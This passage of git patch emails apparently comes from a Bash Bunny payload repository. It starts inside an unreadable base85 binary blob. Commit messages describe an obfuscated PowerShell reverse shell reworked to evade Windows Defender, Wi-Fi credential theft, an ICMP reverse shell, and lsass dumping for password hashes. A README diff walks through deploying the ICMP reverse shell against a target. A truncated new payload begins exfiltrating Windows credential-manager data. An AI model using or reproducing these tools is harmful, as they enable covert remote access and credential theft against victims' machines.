z<%)Mc?X6nz{&iPW#wR>ooANUXMm)W==AgEp|9&0^BF&CN|G*^mUUqD!8%vL>74OB` zE939&eL1`BAxvuzVdl{>izVg(h$XHEJJetIb+RjQ7gE#s^+a8xbVbqphp_lLyl-*> zuZjQpXHaHQk%{CR$t22c>vX^Qcy`+oLW zmsZDrO)mP>Z1?7M@y97J{(G}0{@%uisa-G(?R~|y|H;bi>eowuNp8z^Kl1)8_uhkP z?zi47_*LSCzaz2_=*WH}J7-=^fF{q^eueG-+p3paJ~)- z5My)P@sY~-i=HmH7abSt!`CJoaBPJfZ=Z8-u8zNFTI!$iXV8mZtBD^-d<`*$nFFdY zq`d*lFhcUcHgW#dS6m%HIFY((Je{KP_nx{6NI5X=E;C%&tsu;|n4;6(B@npTU(;UWmaIB=bk z7z3*H}0iYPNG5;cYvkq56}r);vEaN@#L7M-im&-hq>d!j^}aBj+k;}bt2 zKg5j*p2R$30@kWuM;?Zan(n*v``~6Wqc(8^z*30p%kKb|=vMp(65se6U@QS{&+kJ6 z#GgpyBcmqXl<(*DOu`F6$M{jb_pvlH4-EVCJfJ8|A@0t~{ABft7uudYn0{Ix%Av9B z)Kc6XOwXqD!SqZbw63E4+j2s!GagF4V4;Bya#iT!uh~8`R$3< zkfJ+JW&F*=A5~&&ek~G++Qd?2xw?HqW!;|NVNuxpA@RdkD9ZkTjX`?i;aBM%{pCQS zkKpcQzr|q?<)+~`O~viS-h&l$ti;`lO|QM?!X!`pk%vH1Gt}cG)P3qhAc+z1)^yKv zdx;IBB@SIS(|z~6tsrJFy_HyhLTc&Ak+v!64*;qK+h4Zp5SxD^0L2e=yKoOpZ6x*? z5<_Ir?)dU6JY5+z-3=L@{ZGbD#|BXspoZxyz*pUMd_JO^vfEztU@@3!%&v<66LC`q zg_ZGl+&@N)T8UFgGnnXrjV&#&pdx1@;|Yu@bn*vULLrTKPn-xM#~;DX{^zsfUj&8bIh45#_wK##LhTtE z%^>tIs0%obr~CVHUxf{B{6E#rtJ$5GVIrrg1%WkIg`Q7MHUD!bLlLc2lZm%c`_y`1 zZxF`{+52C{Y(Z|Mb4=sLtq?(oY`-4f{J~+Y(FS?pu2#jHRPOu@AW9%{Cs?}Xjoi*b zgfgv$R5UDX!qH#i(~9ML4wkRh8*#77E5Bt@d_gMje3jScko(3JMsBgn+w90INabZC z58-({$~NagHSs?>;_YvLC08AX6{`xjKhg-Yh%nH+G0NMQPctG;UFN7$m+bw6Xa}6U z&;(jKG&yUV^F4Ary7%iT$5Y{I&6`YgU>QHwrRQaA=6`e>T28Gp|AgaTDzY97h}Gk% znZ~w*k@oM)Zb|Vy$b6sBd>M*wCGn+>P_Y)!I`?Z{j1SjC-u+|ZO}vk#_E;tf7=Mtx z6neEQ6vh8rY||(8Ygbvs*u88CB+2go(){Xq#Mr%4_{kp) zTIe9gDB|9ux$~9wYrt*%>jz)_5wM`|+yv&tMVhljac%%7&91%Zq6q3oFfM`bQ9NnD zo^?J@71vn1eJnvyU;ZDY;l96^llDL1E^*zT)q)Y?|Eb0MAb$8~jsrvYB@n$4qH25Z z=`Q*OIB3O~gDv@#m0|_}l=iKcRcT(T-2Ne23w5WzK}Ka)jwC*>GuP=%9429L{Bok5 z(5`uzw_t+kS~eF%@8Oa8Dn|Y6eKfw|Se+)Cb@3N3)`ufGP@)b7aHNTRa%Jg|dvoGS zRIF=W6CB`)zXIv~Khl|rucH{6kzWKi)-kt&WAb1@d3oM%VQ8X&6wE&Z**FT?ze<(; zTEffH??BrWG0cx$>FcPt?s@l<{1}|tmHwx%s6(Os=xk(K;tVCoTyK)0}KDmky2XQS2%GV_%-sf3+5R3gf=k{{qY&J9moyAAukGYc=ZtSdISg67wIX zj6bkH?$Cd-7P>N}{~8jx9U^Q$orjJ5i9)D-Hk}#W{u1uve^sZ)Pb98D>Zir+C_jyk 
zp?^&^jX%;HZ?g_o&9cTu)L7C%e$z))Ux4DoEl`&l-)R3+)4ePc5A58Vab)AhBc+A2 zFQKOq@qccNzk?X_JHom$zfO(Fr@>(Cr?B?wf(ck6?w#1P`-E!moP9NEqj)Cd7;nmN zxk>q_eOLk|CZ0kZDBkEb2J4_k>1#1>C~9^N_p)xGK82TePCQ%CxX>ZS`EC7R=P z0AuZF0zju~=uP~JV$7$Zxf<#st_>P`3)xWJNzf-1R6Yk>ScJ7)My-Wq*go8#5xW$b z{|h|d)b0I>@_qVW0ifxgfg(sff)v(u>Gy*|HUmP6o7Q^ON+T*-aw2Iwb@mNJiuQpu z@ikJ`RZhRTQEP-#b!pk)gqn-%Org8MR|j2D2wje*Qu9Xn#i|y6g(Rk9ZQXjM@WKgN z3;qsgd#6!)Z~1emoRz)56RRlr=@Jo3rb*tUl6RQoek4)C z107#vvq|i(2k&j4f!$36NCFeL-o2 z&AUEI8c%()i%8K^;7PpvqAL5DFEYQX;uX5cn~C8uFx110H&C3rZfg8P2wm3MZZ|7+ z+-|UL7g%7@r2>zX_eXPFFw<&HM?FC(^G)m6Y3pnE9ZjR4cg^omVOO z9&VsyP?7oXVxg~ql*3;vdJ-{poqm~5K1{_m(mEwY=a?iOv&en z6nzh@iT@r|W&Z$Llus@&f?&Uv7`_FD%V5SIQQQ@@UMY`*SNP*IO3P#%U!t|v6KD6l zH#ZZRe=&x3GaP?^gKV690=`5ulGG-o@sC&g;LBT9;r*bS!_HpcF?| zelv05z|r*IFMfflG0&y#T z#vTjhe*R0;*4^_ShifM{Bjow=N8yIVwa|p4yIr`i!kAF~5S;>+zKQI+DEl<18!M-$ zU0vm~v^lqIBCF;n|DuaPp8$toogje(ducATZ_P(YhARV`Z0+=oX~r1`}cl;$fPn%~`M zH2)?`Y2HQ^xCR1=Uuo`h!HsyG4@MP#PvHiJoB>00v@eE)ewQK*cRlV)Yr4z75=AG) zgBo>ksLuZ1#l!caPQV*$3f`l2RpP+&u;!8XX2(u0eIEN_oFCT2|5h3Qi#vJZALs<% zv*LGcf7OpB^ut8e($)d^TO9ykhfeoLucIC~>VcykIO>6;9yscOqaHZwfukNc>Vg0F zJdkG1vg|V!EQ~IU+6%qb!stpn(7LNJ7-+Ji{$Ow}5Oq_&Fskmi6a}_T-nTpMgQ@#a zI2Khrb2Ia-tqV)e4q0b3`I-Z*K3iQ2qxDy1E^M;=jZxdz9u7o&O$+8)!H~Bx76`T4 z1bh9Btvdi)joVv8k(S1wz1`<;+!Y8#7FbcgFBqK4FHf*f|k zbFb7HeqyZH)94R{ioKzh^Q^gN_*$C+&2#5k(HP3}+EkH<-P9Osw6|=t%WW$h-Q8rh zM0b>00DY)SFlYr@gCVQk=k;2_Xe?yKqOnrT>)%;Qd`qoJu(91Dms&AjdyI0IQtnb~ z$s)U|waE@OEB#QvXvwO%7A*En>+ZSMnl;v%wKeYZH(E87nyMPCji{e{CO?KOk^2qM?!ccjn-7rObEumdL8_sUB!@fvMAR0xB zqU2C`54^w9a&L#yMsIAT zAc#OiT>HFaTK*!%Y7?uSmtT>Gc8~h4?eujO-QcqUpPl%`@G08v;LmT2?AT?+yuc|; zJ?;&aRqLzQpKs+YS(I03<)OuioDpdC2HTo^_PI^LW^Ze;|GcSaG}aUhY@Y^>z(q&E zZLI+a903ChgpNc5J6aoq40Ftfn*$U9!TOfQK$iRSr;lc&6f+?A;zTGSXCPyhGIGItBlDXDcX9U6I zrG7feqC>%E1|^x2BI73wM+>=H?epxC0{d#C*T!gy3Z@E7`9)PiyGM^1Ho9}Ffzhzk zy(2L%IwkHWTR6HWx`g};mkTtuC+v$(g?*7oE47)ElbdlWq{Cwh#vg8Uz!J(vq z=>lO`QPC>LOyWl49T{-oZ}f_`r$F4@7?6Qz#sf#(5N9~zjnObcMQy}P7lN%D8(W*U 
zhuUeFu5Jy)M6t0ZEE%STn~MECQ7=0GG#Mf9PM@$Q7-(&4UxK+F6TnmnofFlTOqbQz z*2Hz=l?$RfwA%#}sQ3bVt3_i9YNOUln93={{Zt3WgCWd;%x>UfZ3>!9-*8vZR@7sq z(Bx}{J6sq*lp0dyYY)U+r3k8PP0#Ur>)Y#T0h8ieTU}FSFKR~kk_3%7sGkqTpbHVw z+#GC+`d!W8f>q7lU?}QSw-zzBH13?#qsC}&OVgHfN>(hVNb!21WC!NY)?Kc=HEZ%H zwrQAK;Pn>RDl^aP&C`V}SyJiqhA<1!LM|BGqe@m95q3+rAk?6dtTEWxge@*DS$Ym< zwD?-Q;XN*5FVwvn3@DO>RHb~a6yxPK;7K$bXd>>$SX)$s0La6k$W9jvM;$I>K~zFl z9lka$zE+pi?1F~!avH`JK*iHlZ}=>g#FrMJRI2i;X<{dYt|Nycjq7h3ET|hgFZ>TjE2?ccq#UUwoQCH9r&|F}ji|H4`9?#lErO<#*x(TZ}8(RzT zZ^z`&9PkC3qI$q-wkxYvZ$7`Ou4)aJi)9nwz&QD_u&JZflKVAjMo73}JL^ zX^ieHv|Gq7>e_{NW1;OuN{OlY4}%8M*dF*$PYo}!QFI^@LQheXC?;F9PNq#0=b5x2 zfy)9{`9jSuN)$}y>C!ll5-N`-aMzjB=S9O}sERrj1o2tqxH# zH5|#G9cj`{#34~?FScFece}`Lgo0@s>gsFRyWvR4OYya3_2#u3t1qXvAtMoJq@J8q zkB|jHhRUJ)$#q9&CT&EwD6q&br8Uf1TT9L&W|WX=24iE!kuv}_xE{|i3WsrLhBVd4 zN;%dTr1$EQYg7HXKy}NjF$Xu>3pQmcuBl4x3hQgC*Ke+?-+0mH4Qs0E*Icx& z*1gFwUtIPSAFtl`+wvI#Kj$ub&1^n4*VX(@qnzSSEm>+1{9%P@XGLQhpRsA%6(S=#ZLI|IQWl~!nPtUiCuMe8>y zCeu;DpNYL%Bov{R-la86mASCGrbfx=QC+DN5u{@Xj0gC32-2|xEv$nf z2S~>hg*JUVKsvT4wCURc(lJJ%P2U<+W=l|+jrxI;zBQ+@keH2ybQGehwp8;_FC_0w z9q)+?5|p`s97|gZ&8Xu>6-Ngug*JV2ai%<~KcuxU>BOawjtFpArM!;bFlCZMn%9rc zm0L=l4r@?-d~+$PY*Y!=pl?QvSEi!IEkNNG!)xp$ag<}C9dU_qZiA1G956=e(T=LU zh?38Q4|6ZgsSQPfMmWQvbgasv$#NdiCaw zm#x02?xOWpCN;s9D;F=O@hNY6TXYYW`+4A=f=B%XaWl~vzKER8Ew_lm&)idh;htAj z0kpm964XVvx9w0TGCGj2EL7c!>?Cwo*rjn5657g*Rhu?fSJF6%?P(jvRW(RB24Kjx zVYPvM4=owgID$S&DpBYzEJ0AGb}XvN1kA|5lv~u6+y11Tx6;nD@xehrCS~Z6!$v%# zNPW&`I}amiC|6nQaYHPXdf2h;&C$jkJ{)aL9?UieBA67_5+5f`Xoo;JrcdlFIs!9? 
zSo)mQwJ=(+(vF6G-azvnn~ra{6t&|M+(xgy5I?ya$F;Dw8t1W}YQteG4q1q!7*T}- zJ(|9Wi3FzbuMeq%9;~deuRnrS9b%K+m%2C5snvo7b5XC2%3PG%Ow0HkSPQoLFcP9f zS14lp13UaUW{lzZw?HjOy={>Qmi_idwG>6ATd-5aks>tZwKTQ|TH0FF{7d@K2yHE3 zj*>Q7&|wwg4YdWE@ZEwn3Z|j}GPeg>8zXzrnW?+r0I-;pRbxGi^{*&SLDespJ3TQaTx)SG+P4@OZF<+GQU{7oB3AIJIS?s)p(L6ga$-|W{R?dfq z#KCwbnoBRwwk&MgR!~6xR!5pHbpVQ%Tpz-+QSUnGyUnLHP4YE^X`^cH02Yufp@>hp z6HfDjcPbwmFbZS6v?Rv5SVsxOQs>uLaU;~sR7TquXLKM3Lzi9=76&Q6&-wy0xi!P<+Eou(q zu)ZjY{tutw6r6U9+Mr^T=}3Vq*c42u!Qm^P57eK(elstr=vbiD=WBv01R@r0_J&P0 zmG$eZ>Nc4L52jU{4{I@ALtRQwZ4H)do{MTKt2WqM^NfqO(mVOQ`OUGBA&h1z{ozjA2H=*=zyrJZN4~>yOlpI!HzPELj2%hWDrujm*cv zr`pj|Pa!*5j(E`DqN#0+R)htO8VczERNIR_Vann&)X7;$4W5fj3l`A=89NcRi^6t; z${{%{BwYbDv)F-iq1U_04lG_=;5c2isXu{(Hxd*#1&d2b0bfcF=`x24p+a>A4YA2` zC?EB{sxfSbFj`Oz&=(M*)9b;E;ZjP@+KRezVjv1v8kx<=wr4QR<(ntoX+Nq9Pd2H;X60v; zXxfbU3#pa`g|thYv>x`8;q~?Cy66D0#z;(^;;TBi7E$2^_GJ7lT4btGP{=h%`J3#R zyhy7m)l_r_K8`N3O>3NiPwm=VSRDjnFi4#u|2zD628sB0u<-(R4D)$luF!?j4Y&Jmt2z@c8by?%2|jSgZ}4lRxr%)rmFld@-e zHt1{$M)$P1QX>(?)Dfj`#R;Eop_IN4EW2@gC=$b#)U+!5g?c3HXmTyZx?T@bsnZ6X z)ScY;h05Tu3 zg&l|qF8C%DFUFM|Dyf4YJ>Jv95ZdpPq9$x&=s>X0rsol>;7htNy>7&WgHxVjdkqfh zw)^b1=n?AxoVW2cdDNsz!1-e#RM10%a@#ev^hE{mpD72s1M}Pj%v)$oC?K2cg)}1L zh=4EEA=Gw8-N~mlsr66ohI%Z?>uc3%#Rj{iec6iTrOTU^m$Du+&AM^QzLt*fu;6RP zK#W-fR;hzSK1SDPTPV_B09k6q)wOHuFW9`U)}?ON)h<@F>S9GN#1X<}8|%+FgU{*< z?UF*f6a(W{RkD%axM|%cCBLC+Q%bIC4IQ4;1FCn|)Le8a3N*&xX#}0o<3NsadM z)p>}cycGYD_I?B6Mz)zzAZ*P$iz!54vjKD-jJ7Qwfa#$Uz60{)X8fjVS z6c+q#tqut;rx~YJt|Lp)?L|7V4Zx_j+h;e0TF;_s8^>cdhRa=a786jLbXET;@q(J} z;BZm5IMq{3_#$hId99-tOFFCymhjq%qYPVAwf2Dx8+C_pK4&XZgF{1m$5XCNRT~QJGj&zTLu%A6DxEBz zo-fi%G1Jt&nx8RF+DYZ&Nf<`D=1>^N(0NNR{4G%ri;BHiR^{!^L(MQR&~$905Ow~8 zXK|^Aa{2*~nubzO+|+KNeG8?rBqxF;Yo=MyHDi3mo^UJH(oRP9hLt)9q*Jy>|#|$Aq*tp|t_O zA0YVXp`v&(z|tk@?`hr1n8bn6I}!>L3Q|h)h(F_L=<1Qx(A@JwxZf9Otk2{XskZaN-syz(y`g3 zIsB*cHTmdS2cJhr z&^Tu0k-xMQhs30Y4vEigZ3_m^Q&D-O9BrG+vDK#;gYI?g;^Cn*Wg&v(3m{HV( znRx)NAE_1Uqk}~SXX-TV*s=dqQ&0+Ie;?s)sHWKj$Lpq5_4999RAHh(>*|}SUYdNU 
za;AFVAH-fRuY6&!4W~J1VEup{zTjp?98-Mbr6U|ZYlSolEB1x7Mme(uA3V$Fr|M`= z?R;L*AyZ4?IA86oIV>#d{5VEb;foKd*D!ZN@L{Nvox*hWmo^GqBtQ_~0sTW(R z^#{peL55{*9^Uc_d6z6~T7rcFt$Sb|gxP=ejuO`BsEuB1IpiWHSgGHrhw8+o4iKn7 zb97*MHD z%8VK+=4ttzT0e+S>7B~_!Ft=8Fk$|i_C}{Lf1utaZPAFf#Ub+n_1m%Y2<0EFpZs@( z(9Hfz*>i*piunM$b~gEXak5I1W1-8!|_oS4flhH(kiUW;mC(7`$s`+1C>8{1kh+Q|9K7qc z@iJAPOrt2Zq@8SJHE`=?Ef1_(9}K5amEP>bt$qQA&H(VBk}q}}JsJO?<&l2iPm4Fb zyT+t~Cp4%Q&#HO#m=o}RrIU|d$h41`hO1WM5fv8EIB27`!ZUhAe#FkNw|8Tg5iKS? zseL<)uS`@5MIBVpx%O^oipX*5qvTC6*3Y1W$K$LtYh)yt23%5nPx+z*ts9sXW3^J za;d2}<(=V~igAlpheeif&y;siIB-^}%Bb@w!dnfk>V-vh7=&X_^**%P@J*GYw^|%>w3CR0n%dL}1M;YcPm1dLQ#_e>X;js; zwVUwL0+M(Ggx+oN1)EdjkW+x(oN<=dg7dmV2a0-r9EIpH7 ziFbRbmTo-owOiX-w)@l)*BipS8Q4jo(t1;?+S6ICax5O%Zd2mx=-DNXc<}EHkZ)6O zYmhLzm7ejSEY%R|)D0)+7^l!X>9K62agQm92A64`uF@NIRA_2Ea=aUa_eBC`6Q#E^ zh?yg|QS?(t{R=p=<)T5wJW$TeG;jD|Rj1E56;NPa_DQ`S#QP+?C^WePz~2zUtJ8Q7 zg?60y8JvDq1cUf4^o)o-{m%+j`%^zIqTj&Tb`||(QqS=;Y$15;rlut=Elc*`qJwNq zPWF~oyp)5#(Wm5El-xQj@9`=Tb;PDX6t7_HvD?CEJM|Mxt#3=-2iccr^ffDeYw48{ z)lCrT^rj5QA@tMxHpqqLs{DZBuhxOh;YLdaC8U1MiRSc0!iY6^AyDjFiMpz4YkB&8 zA>O{L!$A_i$$|FMj|L#vZ0f88)oWl=ewa7uzo61nLqV@!j$&JMiABVy?2XVjUQ@v! zOb6C&kw6TO)7Igq5_lYeH$?DIBNEu&re7wy=7A23GkEf=j_3-7ahrI1(W6KbSVq7HV8 zIEywber3P5)^@CPC{(s-K9Az_nBSowaPj(Lq%q|KbM#3)UP)36$E zeroqly(C7nBX>vjm?Kr*YW;#8YrzpO-mt=R=xF0El%{_E(P$U9Q*5DqDVDbHp=CV1 zWvz6WaxV+DA)fJuBfq@p`0chHcTgv-ZwsD$;1GfaqisB&u_p4n)Z-ZN)Bw7r2vX36 zL8X}nAiQ9T^Iz^MWIYTbJ$RW7&(dl9L~ZozgFZZb;lY&V)4VN3E!*(EA5Ks3`U9Cj za;AJ96`>zZK)S3J5nLSw2P!qCrv9e$KBQ<`*GEAPN z+>hN9ZlDmAH35spZf*=4WCeKBiH`(s>m(hEz8{F$RUA9UEA)?bpt7?6L zmT-_>zl6sl_<<9al+D@$q-R|fp43Coy}G)ldedd7kiE8g)B3878|}3hZLr;Tt$V|! 
z>NT5d+#BrL%^PYj+E`VL7iZxxn97bMJs;qGno88GpY$*z5R4wtucChSU>1KtAFh9nbouZ8`ZCqRELhy5W^vdqvd8A-wW;Cm^f8`IikfavcF=zuMNBD zKx?60>2KVLQ_R(Pw=>v?0~J44Q}N+_QA`tN=Z&!o{oqq=czTVog9f&h{#Y!$a>;OD4aH&yC+sCimgv^hujYJM-jyGxJ{he;^}u zQ2N*3N+ut~hwgua&p}5U-H-b|PIo)-eU5vQyPDHGL8lEI2F*cL>Q@i=!zQ#k) z1gq3inlOB=YGS1$2|Z)+LIm3x^CtN8r5OFGKMgRwehg`P!KfZuE>TaVsnh9MN@Y!7 zlF_e@#ONG+di`v_J}Ocp=7(z5^)dQWzn7d||KtjGSD4qZ+Fm2Cf3JauB-1#Tmdm_` z#?LrtS%Rk<7%(u7@s?!zx|4;QX-kCPNBF&%TJg3HW{+*SYq1-fnj&-;umhN0=&s%N zwzM|UT@Y_XYb->+;h@JK1W*1ElWlmToXZx?ss`2C8v7Ex#Inzp`81o-(W2TGZPYt^ zUcu75XXMT)E-60SnjGD3y@jr^Pil4JOv4qHRWX!I{=u#BVoJYH>9mt)uX+IBe0*G; zh;jT~*3Qo*lP=I+&^hUrH3B+}{6k&IWCiey8!`PZX z2kCF%-!25r#W>)C9qpiDP`Xak#7etrgO%2vlXmj)$7b}T9h*b=DU=7B7c&o$>G>@S zf6i6$+n-G)8(@=_m9sW0_k!%>c4u^0pZxf$MQ7*d8Tm@w)Wws@3_4Z?&2qW3?A2MhU|OA(vF5m04+C1`fGUrJ3j9TCs|4-1wFiIG z7IbEvvwi^iN{77rxXP@unyiX#S!I=3C2mom`#4qS8=y1ii^=3hsJ7gxI$w}w$Fg#f zhJ#dlJpeur_?8l1Wmb+K__?_KZ{T6zuMn>4iz;=`uA=%@QhnD@eP``D!Zxsb@Hrms zY$HZb;<|ld7UVxadu^88J!fr}>jv`IXO3}amF+#YGOKphi*vKefWVXRXv%r#AE$KH zLDxT^>%UUEs#3bDNEh7jnPcFTy~kdd)i67prX4d?7i=oS=Wgh#Lmw%}y{;E@IqS8S z>a`)u1y7~y04v4cC}g)nb|Fn8@Cnxm7I)8CO?F(Es?+&d=C1b31hR^(B+9(LXFSX?r!Jf zcnI2%f~o*j1Df?i!$b%%&HC%K4Y~F>8^zk_J2&i4Ce=8sViJ95@9gulC=*vDeZZ5r zCz(_SFv?E&;PVuBY^Q2#54H9ASru1K7d7-R-&i+5kM&>4B!$e;>!=5gdf=!Bj(Xsz z2abB+s0WUE;HU@w9S;n6HCLGFIrs-y=<2^w)7*YdALMiyr^8J9nNBeMG4s`bL(5fs zQ`1hS2RQ#XOvjlXdz0onjp;c|jh+FPA7y%>$j`Y~%a<^1VA{ldR}21L&hKV?kkkE~ z9_6(4Ev?tZ^l{FAk?Gq^XMI`oox=2NrpEqSmhWLY%vAE_d|T_OW!lcPkLfT|>psm_ z#?)`pqTD{l4>8UCj+Qfar|e^VEz4gn^mK6kAk$H%x!;{$-<3kXjQM1JpZc1X-^=_a z{%#fNdpP}Lf&Yrre`fkN(|I>*y$hJ0&D7{WU!;54K9j$N^RHlfDbpy^=h^Q4oPL?< z9ZXk$MVG&a`J~=qF3;$_U+A?4wEVM-zr^$~Q;YSNF<%a+3z@o^Zf5Fb+RpaOWY?#d z&)C(#`b~YMUDq@JD{NO6r*CEY1ExVqU%x^!a`RkZU{T+<2W%(^kLrgn`-T~&noAHO3{zCA*$mzce zJi+qD{w(&hN$37h+gr=Dlj-Tqw@mPVlGB@+hM4YU`gNuQtmh$4k8pZ|=?LS8naXnB zXFPXM+h^>pqlDN#k7L?OdMV;^w%=qio2$kTfk}4&T<|z z^T{}uQjIo->8hL|Rp<~*eBEMwZhw3F!o(-EfD!*sV9w~O&tALkEo{tHZp8BcK9@IQAumnYUEX(BD>*9q45G3G1# 
zsn+9XTFUq;rag>b!0BO5Z{_rErdKmH_R03^m0NGFzcPnK3%?9_n7sJS-%)PxsPhTI;K5L2bqpAJ%#m|_%!n7A6GQ}=S=2X&eZU& z<@6Oy{Y+g4EOlMY=~_;rs`fKF#zwrU|Ad-jbZo`nsjA zT&4?{x*pT`Vosa59AUZTjGOjzbK2CqmgS9qF5`T^(Z}?&Ce8ePOpTtea=sa7zR&3= zn7+VtoaJ8Uv~{Ppe?HSiOh3tV6Vm|G>zLY)Yq=XaeJ9f&GJTwB9rOJUr_FdY%IQ~_ z_AuY9yR_bqGBxAMAm_UnALaCNPMh}Mz-d3z>zLleG~=Mwe=nyiINibYea7eAt@-*H zA7=Ux=Re2vWv1^jJ)Y%0&eX)$Cpc~5%EZZ9#@935$~4B*#Q6l5Z|eD3&M$dF+j%Re z{haP+dJp3xoX$C<`M=M2EvGw~n)&82&Nt=#fzxxio+h46{0*|aiQ|7Te^Tf%`bU}H z=r`>=?;F}agPU>fWPvZ`wDqLsU(e|hPS-N^GQNYUv0F<`ew%vqv)m}tlBYCJ1JgdH z38oR&oAb2ht7RHyI>2<4X~utRz6z$DOb3{bFr8p(?6QBZ<+{1N3Qqf(_AoX4gCeb^ zXZ{X-N#_~)QI@x#nTpqPx>w+%oObs zV>-yx@Qri2?3bFaovF$16KP{#8sA*NH^-Zd27NP+)3JT}=3|^5cuU`$%;^lKA7?tq z`KO5df4-j#5tK1oXQXp}_*i{&45!ODe=etg%k~||>0GAsnHs`kR%ezLn8g|GoN*$j zxj5@2P7kcpHwMq;f=#`8*XaCA<~QY^#%aTcf8<-$52Y&zFM+9aKMN)&^OfW{r!U}q z{FBm(|0!cQ>;Hd>^d8TS6bhF&XkabVOPDq@-Np1XOmAj-57P&k9%T9)(?2tPlj$*y zmb(6f>6uKIGhNH{5~j^ecQO48)0>&z!}LL>2bn&{^v_J+WO~eYE}!X{OqVlV%k&ba z%}jSO)zbg>zcX^ul(7Du)Khe$zF*388PhVR7cgDN)b#6GPVb)~-^+O9L-KcjNd7e+ zlHc(m`TIU3zw<-#ZxH#$Kc;>c-=_U%{3G-47V*s_H}kilX8tzi%lgMyel;sJ>j6W} z`hnzW%^>Bk14cd}`_$Dim6~-1qsmruPjnAHPIODug&EfPuP^Wyy zcAa6Uv6tCX_8Yug$oH_kp)W2llA4-w4NAkOvwX8&G}Nq{48M&3TUb6-%^v1tI&r>{ z)YP7uw7!lsm2c!Heyte{<;NT;DOvt^h5W#XW;JwJ2pGQ^g+Ibg7CzL6=rZf$fxqaq zy5~ zC*`gw>9CRYjS-x3+cfPO0EI-TZ)MWoLddN(tyv6GzjpDsvA#WQ+OkV{hUB-Uv qqgo)5rs>Fs$iD$u!J;%9c^aRcmk5WcwmTS4nWeR|8L1pu*8c?xM@xeM literal 0 HcmV?d00001 From 1eef8dc006d2d8fe0a03b08efba3e219378c5c2d Mon Sep 17 00:00:00 2001 
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Sun, 17 Apr 2022 21:47:41 +0200 Subject: [PATCH 3/5] Updated README.md (#513) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md * Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV * Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design * Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update * Updated payload fixed some stupid left overs <3 * Uploaded pingUinBunny a reverse shell using icmp * Delete payloads/library/remote_access/switch1 directory * Uploaded pingUinBunny A reverse shell using icmp * Update README.md * Update README.md * Updated to PingZhell * Update Bunny.pl * Update README.md * Update README.md * Update payload.txt * Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl * Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 * Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md * Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt * Update payload.txt * Update README.md * Update README.md * Update Bunny.pl * Created ProcDumpBunny Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz * Update README.md * Update payload.txt * Updated ReverseBunny Fixed wrong DELAY 
commands * Updated PingZhellBunny Fixed wrong DELAY commands * Updated WifiSnatch Fixed multiple mistakes * Uploaded HashDumpBunny Use your BashBunny to dump the user hashes of your target - similar to the msf post-module. The script was obfuscated with multiple layers, so don't be confused. If you don't trust this script, run it within a save testing space - which should be best practice anyways ;) * added example picture * Update README.md * Uploaded SessionBunny Utilize SessionGopher (Slightly modified) to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Afterwards decide which is important and what you want to save onto your BashBunny. * Uploaded SessionBunny Utilize the famous, here slightly modified SessionGopher script, to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Decide which inforamtion you wanna take with you - save it onto your BashBunny! * Update README.md * Delete SessionBunny directory * Uploaded MiniDumpBunny Dump lsass with this rewritten and for BashBunny adapted version of Powersploits Out-MiniDump. * Update README.md added disclaimer * Update README.md * Update README.md * Update README.md --- .../library/remote_access/PingZhellBunny/README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/payloads/library/remote_access/PingZhellBunny/README.md b/payloads/library/remote_access/PingZhellBunny/README.md index fe1bcb23..ac8ccd9f 100644 --- a/payloads/library/remote_access/PingZhellBunny/README.md +++ b/payloads/library/remote_access/PingZhellBunny/README.md 
@@ -24,18 +24,18 @@ Install dependencies, if needed: - NetPacket::ICMP Disable ICMP replies by the OS: - *sysctl -w net.ipv4.icmp_echo_ignore_all=1* + `sysctl -w net.ipv4.icmp_echo_ignore_all=1` Start Bunny.pl -> perl Bunny.pl # !!!Insert the IP of your attacking machine into PingZhell.ps1!!! # -Plug in Bashbunny with PingZhellBunny equipped. -Achieve reverse shell. -run away <3 +

Plug in Bashbunny with PingZhellBunny equipped.
+Achieve reverse shell.
+ run away <3

Credit for code and ideas: - bdamele -- nishang +- samratashok - krabelize From 3f4149415334c07acfbef12f457cf04d6eef1907 Mon Sep 17 00:00:00 2001 From: cribb-it <24548670+cribb-it@users.noreply.github.com> Date: Wed, 20 Apr 2022 20:04:44 +0100 Subject: [PATCH 4/5] New Payload - KeyManger Backup (#517) * New Payload - KeyManger Backup * Update Desc --- .../Win_HID_BackupKeyManager/payload.txt | 66 +++++++++++++++++++ .../Win_HID_BackupKeyManager/readme.md | 30 +++++++++ 2 files changed, 96 insertions(+) create mode 100644 payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt create mode 100644 payloads/library/exfiltration/Win_HID_BackupKeyManager/readme.md diff --git a/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt new file mode 100644 index 00000000..48b0284a --- /dev/null +++ b/payloads/library/exfiltration/Win_HID_BackupKeyManager/payload.txt 
@@ -0,0 +1,66 @@
+#!/bin/bash
+# Title: KeyManager Backup
+# Description: Create a backup of the key manager which stores log-on credentials for servers, websites and programs
+# Author: Cribbit
+# Version: 1.0
+# Category: Exfiltration
+# Target on: Windows 10
+# Attackmodes: HID & STORAGE
+# Extensions: Run
+# Props: Paranoid Ninja
+
+####################### Config #######################
+password=lamepassword
+##################### End Config #####################
+
+LED SETUP
+
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+
